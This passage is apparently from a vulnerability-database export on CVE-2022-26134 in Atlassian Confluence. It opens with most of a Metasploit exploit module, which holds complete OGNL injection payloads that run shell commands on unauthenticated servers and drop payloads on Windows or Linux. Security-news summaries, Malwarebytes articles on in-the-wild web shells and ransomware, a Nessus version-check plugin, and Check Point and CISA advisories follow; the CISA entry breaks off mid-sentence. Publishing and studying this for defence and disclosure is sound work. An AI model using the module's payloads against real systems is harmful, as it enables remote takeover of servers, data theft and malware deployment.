Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Atlassian Confluence Namespace OGNL Injection',\n 'Description' => %q{\n This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to\n evaluate an OGNL expression resulting in OS command execution.\n },\n 'Author' => [\n 'Unknown', # exploited in the wild\n 'bturner-r7',\n 'jbaines-r7',\n 'Spencer McIntyre'\n ],\n 'References' => [\n ['CVE', '2022-26134'],\n ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'],\n ['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'],\n ['URL', 'https://github.com/jbaines-r7/through_the_wire'],\n ['URL', 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis']\n ],\n 'DisclosureDate' => '2022-06-02',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux', 'win'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8090\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n confluence_version = get_confluence_version\n return CheckCode::Unknown unless confluence_version\n\n vprint_status(\"Detected Confluence version: #{confluence_version}\")\n\n confluence_platform = get_confluence_platform\n unless confluence_platform\n return CheckCode::Safe('Failed to test OGNL injection.')\n end\n\n vprint_status(\"Detected target platform: #{confluence_platform}\")\n CheckCode::Vulnerable('Successfully tested OGNL injection.')\n end\n\n def get_confluence_platform\n # this method gets the platform by exploiting CVE-2022-26134\n return @confluence_platform if @confluence_platform\n\n header = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\"\n ognl = <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n ${\n Class.forName(\"com.opensymphony.webwork.ServletActionContext\")\n .getMethod(\"getResponse\",null)\n .invoke(null,null)\n .setHeader(\n \"#{header}\",\n Class.forName(\"javax.script.ScriptEngineManager\")\n .newInstance()\n .getEngineByName(\"js\")\n .eval(\"java.lang.System.getProperty('os.name')\")\n )\n }\n OGNL\n res = inject_ognl(ognl)\n return nil unless res\n\n res.headers[header]\n end\n\n def get_confluence_version\n return @confluence_version if @confluence_version\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'login.action')\n )\n return nil unless res&.code == 200\n\n poweredby = res.get_xml_document.xpath('//ul[@id=\"poweredby\"]/li[@class=\"print-only\"]/text()').first&.text\n return nil unless poweredby =~ /Confluence (\\d+(\\.\\d+)*)/\n\n @confluence_version = Rex::Version.new(Regexp.last_match(1))\n @confluence_version\n end\n\n def exploit\n confluence_platform = get_confluence_platform\n unless confluence_platform\n fail_with(Failure::NotVulnerable, 'The target is not vulnerable.')\n end\n\n unless confluence_platform.downcase.start_with?('win') == (target['Platform'] == 'win')\n fail_with(Failure::NoTarget, \"The target platform '#{confluence_platform}' is incompatible with '#{target.name}'\")\n end\n\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n header = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\"\n ognl = <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n ${\n Class.forName(\"com.opensymphony.webwork.ServletActionContext\")\n .getMethod(\"getResponse\",null)\n .invoke(null,null)\n .setHeader(\"#{header}\",\n Class.forName(\"javax.script.ScriptEngineManager\")\n .newInstance()\n .getEngineByName(\"js\")\n .eval(\"java.lang.Runtime.getRuntime().exec([\n #{target['Platform'] == 'win' ? \"'cmd.exe','/c'\" : \"'/bin/sh','-c'\"},\n com.opensymphony.webwork.ServletActionContext.getRequest().getHeader('#{header}')\n ]); '#{Faker::Internet.uuid}'\")\n )\n }\n OGNL\n res = inject_ognl(ognl, 'headers' => { header => cmd })\n\n unless res && res.headers.include?(header)\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n\n vprint_good(\"Successfully executed command: #{cmd}\")\n res.headers[header]\n end\n\n def inject_ognl(ognl, opts = {})\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl), 'dashboard.action')\n }.merge(opts))\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "trendmicroblog": [{"lastseen": "2022-09-21T15:49:07", "description": "Users are advised to patch immediately: We found exploit samples abusing the Atlassian Confluence vulnerability (CVE-2022-26134) in the wild for malicious cryptocurrency mining.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-21T00:00:00", "type": "trendmicroblog", "title": "Atlassian Confluence Vulnerability CVE-2022-26134 Abused For Cryptocurrency Mining, Other Malware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-09-21T00:00:00", "id": "TRENDMICROBLOG:B2CE0B51EC84664ADCCD67A2A0DF7033", "href": "https://www.trendmicro.com/en_us/research/22/i/atlassian-confluence-vulnerability-cve-2022-26134-abused-for-cryptocurrency-mining-other-malware.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2022-06-14T17:04:04", "description": "Microsoft has warned that "multiple adversaries and nation-state actors" are making use of the recent Atlassian Confluence RCE vulnerability. A fix is now available for [CVE-2022-26134](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26134>). It is essential users of Confluence address the patching issue immediately. \n\n## Confluence vulnerability: Background\n\nAt the start of June, researchers [discovered a vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited/>) in Atlassian Confluence via an incident response investigation. Confluence, a Wiki-style collaboration tool, experienced a "critical unauthenticated remote code execution vulnerability". It affected Confluence server and Confluence Data Center.\n\nThe attack discovered during the investigation revealed web shells deployed on the server. These web shells allow for Persistent access on compromised web applications. The web server process and its child processes ran as root and full privileges. This is very bad news, and allowed for execution of commands even without valid credentials.\n\nWorse, the web shell found is one commonly used by various Advanced Persistent Threat (APT) groups. This almost certainly isn't the kind of thing admins discovering an attack want to hear mid-investigation.\n\nUnfortunately, mitigation advice was somewhat limited. It veered between restricting access to just turning off Confluence Server and Data Center instances. On June 3, Atlassian [released](<https://confluence.atlassian.com/doc/confluence-release-notes-327.html>) versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 which contained a fix for this vulnerability.\n\n## The current situation\n\nHere's the latest observations from Microsoft:\n\n> Multiple adversaries and nation-state actors, including DEV-0401 and DEV-0234, are taking advantage of the Atlassian Confluence RCE vulnerability CVE-2022-26134. We urge customers to upgrade to the latest version or apply recommended mitigations: <https://t.co/C3CykQgrOJ>\n> \n> -- Microsoft Security Intelligence (@MsftSecIntel) [June 11, 2022](<https://twitter.com/MsftSecIntel/status/1535417776290111489?ref_src=twsrc%5Etfw>)\n\nMicrosoft continues:\n\n> _In many cases impacted devices have been observed with multiple disparate instances of malicious activity, including extensive device and domain discovery, and the deployment of payloads like Cobalt Strike, web shells, botnets like Mirai and Kinsing, coin miners, and ransomware._\n\n## A mixed bag of attacks\n\nIndustrious malware authors really have been having a grand time of things with this vulnerability. As noted by Microsoft, several varied approaches to compromise and exploitation are being used. [AvosLocker Ransomware](<https://www.bleepingcomputer.com/news/security/confluence-servers-hacked-to-deploy-avoslocker-cerber2021-ransomware/>) and [Linux botnets](<https://www.bleepingcomputer.com/news/security/linux-botnets-now-exploit-critical-atlassian-confluence-bug/>) are getting in on the action. Cryptomining [jumping on the bandwagon](<https://www.bleepingcomputer.com/news/security/hackers-exploit-recently-patched-confluence-bug-for-cryptomining/>) is an inevitability across most scams we see, and this is no exception.\n\nMicrosoft also noticed the Confluence vulnerability being exploited to download and deploy Cerber2021 ransomware. The Record [observed](<https://therecord.media/microsoft-ransomware-groups-nation-states-exploiting-atlassian-confluence-vulnerability/>) that Cerber2021 is a "relatively minor player", with both Windows and Linux versions used to lock up machines. Here's an example of the ransomware, via MalwareHunterTeam:\n\n> There is a ransomware currently active that is calling itself Cerber. \nHas Windows & Linux versions. \nLooks started to spread in the first half of November. IDR seen both Linux (multiple victims got git files encrypted) & Windows user victims already from different countries. \n \n [pic.twitter.com/saPGsTlDbt](<https://t.co/saPGsTlDbt>)\n> \n> -- MalwareHunterTeam (@malwrhunterteam) [December 4, 2021](<https://twitter.com/malwrhunterteam/status/1467264298237972484?ref_src=twsrc%5Etfw>)\n\nHaving the fixes to address this issue is great, but organisations need to actually make use of them. This is still a serious problem for anyone using unpatched versions of affected Confluence installations.\n\nIf you don't want to run the gauntlet of APT groups, cryptomining chancers, botnets and more, the message is loud and clear: get on over to the [Confluence Download Archives](<https://www.atlassian.com/software/confluence/download-archives>) and patch immediately.\n\nThe post ["Multiple adversaries" exploiting Confluence vulnerability, warns Microsoft](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/multiple-adversaries-exploiting-confluence-vulnerability-warns-microsoft/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-14T12:43:08", "type": "malwarebytes", "title": "\u201cMultiple adversaries\u201d exploiting Confluence vulnerability, warns Microsoft", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-14T12:43:08", "id": "MALWAREBYTES:4E1B9086679032E60157678F3E82229D", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/multiple-adversaries-exploiting-confluence-vulnerability-warns-microsoft/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-03T21:56:15", "description": "[Researchers](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>) found a vulnerability in Atlassian Confluence by conducting an incident response investigation. Atlassian rates the severity level of this vulnerability as critical.\n\nAtlassian has issued a [security advisory ](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>)and is working on a fix for the affected products. This qualifies the vulnerability as an actively exploited in the wild zero-day vulnerability.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This vulnerability is listed as [CVE-2022-26134](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26134>).\n\n## Confluence\n\nAtlassian Confluence is a collaboration tool in wiki style. Confluence is a team collaboration platform that connects teams with the content, knowledge, and their co-workers, which helps them find all the relevant information in one place. Teams use it to work together on projects and share knowledge.\n\nConfluence Server is the on-premises version which is being phased out. Confluence Data Center is the self-managed enterprise edition of Confluence.\n\n## The vulnerability\n\nThe description of CVE-2022-26134 says it is a critical unauthenticated remote code execution vulnerability in Confluence Server and Confluence Data Center.\n\nDuring the investigation, the researchers found JSP web shells written to disk. JSP (Jakarta Server Pages or Java Server Pages) is a server-side programming technology that helps software developers create dynamically generated web pages based on HTML, XML, SOAP, or other document types. JSP is similar to PHP and ASP, but uses the Java programming language.\n\nIt became clear that the server compromise stemmed from an attacker launching an exploit to achieve remote code execution. The researchers were able to recreate that exploit and identify a zero-day vulnerability impacting fully up-to-date versions of Confluence Server.\n\nAfter the researchers contacted Atlassian, Atlassian confirmed the vulnerability and subsequently assigned the issue to CVE-2022-26134. It confirmed the vulnerability works on current versions of Confluence Server and Data Center.\n\n## The attack\n\nThe researchers at Volexity were unwilling to provide any details about the attack method since there is no patch available for this vulnerability. However, they were able to provide some details about the shells that were dropped by exploiting the vulnerability.\n\nA web shell is a a malicious script used by an attacker that allows them to escalate and maintain persistent access on an already compromised web application. (Not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)\n\nThis web shell was identified as the China Chopper web shell. The China Chopper web shell is commonly used by malicious Chinese actors, including advanced persistent threat (APT) groups, to remotely control web servers. The web shell has two parts, the client interface and the small (4 kilobytes in size) receiver host file on the compromised web server. But access logs seemed to indicate that the China Chopper web only served as a means of secondary access.\n\nOn further investigation they found bash shells being launched by the Confluence web application process. This stood out because it had spawned a bash process which spawned a Python process that in turn spawned a bash shell. Bash is the default shell for many Linux distros and is short for the GNU Bourne-Again Shell.\n\nResearch showed that the web server process as well as the child processes created by the exploit were all running as root (with full privileges) user and group. These types of vulnerabilities are dangerous, as it allows attackers to execute commands and gain full control of a vulnerable system. They can even do this without valid credentials as long as it is possible to make web requests to the Confluence system.\n\nAfter successfully exploiting the Confluence Server systems, the attacker immediately deployed an in-memory copy of the BEHINDER implant. BEHINDER provides very powerful capabilities to attackers, including memory-only web shells and built-in support for interaction with [Meterpreter](<https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/>) and [Cobalt Strike](<https://blog.malwarebytes.com/glossary/cobalt-strike/>).\n\n## Mitigation\n\nThere are currently no fixed versions of Confluence Server and Data Center available. In the interim, users should work with their security team to consider the best course of action. Options to consider include:\n\n * Restricting access to Confluence Server and Data Center instances from the internet.\n * Disabling Confluence Server and Data Center instances.\n * If you are unable to take the above actions, implementing a WAF (Web Application Firewall) rule which blocks URLs containing **${** may reduce your risk.\n\n_Note: **${** is the first part of a parameter substitution in a shell script_\n\n## Affected versions\n\nAll supported versions of Confluence Server and Data Center are affected. And according to Atlassian it\u2019s likely that **all** versions of Confluence Server and Data Center are affected, but they are still investigating and have yet to confirm the earliest affected version.\n\nOne important exception: if you access your Confluence site via an atlassian.net domain. This means it is hosted by Atlassian and is not vulnerable.\n\nWe will keep you posted about the developments, so stay tuned.\n\n## Update June 3, 2022\n\nAtlassian has released versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 which contain a fix for this issue.\n\n**What You Need to Do**\n\nAtlassian recommends that you upgrade to the latest Long Term Support release. For a full description of the latest version, see the [Confluence Server and Data Center Release Notes](<https://confluence.atlassian.com/doc/confluence-release-notes-327.html>). You can download the latest version from the [download centre](<https://www.atlassian.com/software/confluence/download-archives>).\n\nThe post [[updated]Unpatched Atlassian Confluence vulnerability is actively exploited](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2022-06-03T14:41:58", "type": "malwarebytes", "title": "[updated]Unpatched Atlassian Confluence vulnerability is actively exploited", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-03T14:41:58", "id": "MALWAREBYTES:CA300551E02DA3FFA4255FBA0359A555", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited/", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2022-08-31T17:03:23", "description": "The Atlassian Confluence running on the remote host is affected by a command injection vulnerability. A remote, unauthenticated attacker can use this to execute arbitrary code.\n\nNote this plugin currently only works against 7.14.x and below. This plugin is intended for testing LTS versions of Confluence.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-06-14T00:00:00", "type": "nessus", "title": "Atlassian Confluence Command Injection (CVE-2022-26134) (Direct Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-08-31T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CVE_2022_26134.NBIN", "href": "https://www.tenable.com/plugins/nessus/162175", "sourceData": "Binary data confluence_cve_2022_26134.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-31T17:03:37", "description": "According to its self-reported version number, the Atlassian Confluence running on the remote host is affected by a command injection vulnerability. A remote, unauthenticated attacker can use this to execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-06-03T00:00:00", "type": "nessus", "title": "Atlassian Confluence Command Injection (CVE-2022-26134)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-08-31T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CVE-2022-26134_REMOTE.NASL", "href": "https://www.tenable.com/plugins/nessus/161808", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(161808);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/31\");\n\n script_cve_id(\"CVE-2022-26134\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/06\");\n script_xref(name:\"IAVA\", value:\"2022-A-0227\");\n\n script_name(english:\"Atlassian Confluence Command Injection (CVE-2022-26134)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by a command injection\nvulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Atlassian Confluence running\non the remote host is affected by a command injection vulnerability. A remote,\nunauthenticated attacker can use this to execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on\nthe application's self-reported version number.\");\n # https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c1df4fa0\");\n # https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5cd914cb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26134\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Confluence Namespace OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar app_name = 'confluence';\n\nvar port = get_http_port(default:8090);\n\nvar app_info = vcf::get_app_info(app:app_name, port:port, webapp:true);\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nvar constraints = [\n { \"fixed_version\": \"7.4.17\", \"fixed_display\": \"7.4.17 / 7.18.1\"},\n {\"min_version\": \"7.5.0\", \"fixed_version\": \"7.13.7\", \"fixed_display\": \"7.13.7 / 7.18.1\"},\n {\"min_version\": \"7.14.0\", \"fixed_version\": \"7.14.3\", \"fixed_display\": \"7.14.3 / 7.18.1\"},\n {\"min_version\": \"7.15.0\", \"fixed_version\": \"7.15.2\", \"fixed_display\": \"7.15.2 / 7.18.1\"},\n {\"min_version\": \"7.16.0\", \"fixed_version\": \"7.16.4\", \"fixed_display\": \"7.16.4 / 7.18.1\"},\n {\"min_version\": \"7.17.0\", \"fixed_version\": \"7.17.4\", \"fixed_display\": \"7.17.4 / 7.18.1\"},\n {\"min_version\": \"7.18.0\", \"fixed_version\": \"7.18.1\", \"fixed_display\": \"7.18.1\"}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-16T00:14:51", "description": "Atlassian Confluence Server and Data Center versions 1.3.x < 7.4.17, 7.13.x < 7.13.7, 7.14.x < 7.14.3, 7.15.x < 7.15.2, 7.16.x < 7.16.4, 7.17.x < 7.17.4 and 7.18.x < 7.18.1 suffer from an OGNL injection vulnerability by crafting a specific URL, allowing an unauthenticated attacker to perform a remote code execution on the target application.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-06-04T00:00:00", "type": "nessus", "title": "Atlassian Confluence Namespace OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-15T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_113248", "href": "https://www.tenable.com/plugins/was/113248", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-06-14T17:56:54", "description": "A remote code execution vulnerability exists in Atlassian Confluence. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-06T00:00:00", "type": "checkpoint_advisories", "title": "Atlassian Confluence Remote Code Execution (CVE-2022-26134)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T00:00:00", "id": "CPAI-2022-0297", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2022-07-01T13:56:33", "description": "Atlassian has released new Confluence Server and Data Center versions to address [remote code execution vulnerability CVE-2022-26134](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data>) affecting these products. An unauthenticated remote attacker could exploit this vulnerability to execute code remotely. Atlassian reports that there is known exploitation of this vulnerability.\n\nCISA strongly urges organizations to review [Confluence Security Advisory 2022-06-02](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) and upgrade Confluence Server and Confluence Data Center.\n\n**Note:** per [BOD 22-01 Catalog of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>), federal agencies are required to immediately block all internet traffic to and from Atlassian\u2019s Confluence Server and Data Center products AND either apply the software update to all affected instances OR remove the affected products by 5 pm ET on Monday, June 6, 2022.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/06/03/atlassian-releases-new-versions-confluence-server-and-data-center>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T00:00:00", "type": "cisa", "title": "Atlassian Releases New Versions of Confluence Server and Data Center to Address CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-30T00:00:00", "id": "CISA:9E73FFA29BFAFFF667AC400A87F5434E", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/06/03/atlassian-releases-new-versions-confluence-server-and-data-center", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-15T14:02:20", "description": "CISA has added one new 